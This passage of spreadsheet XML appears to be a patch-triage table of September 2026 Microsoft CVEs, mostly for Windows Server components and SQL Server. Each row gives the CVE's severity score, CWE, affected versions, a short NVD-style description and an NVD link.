          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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1" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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12" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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3" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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14" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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15" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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16" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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17" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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18" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56172</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K120"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20" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56177</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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21" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62697</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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4" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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5" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68845</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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6" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68848</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
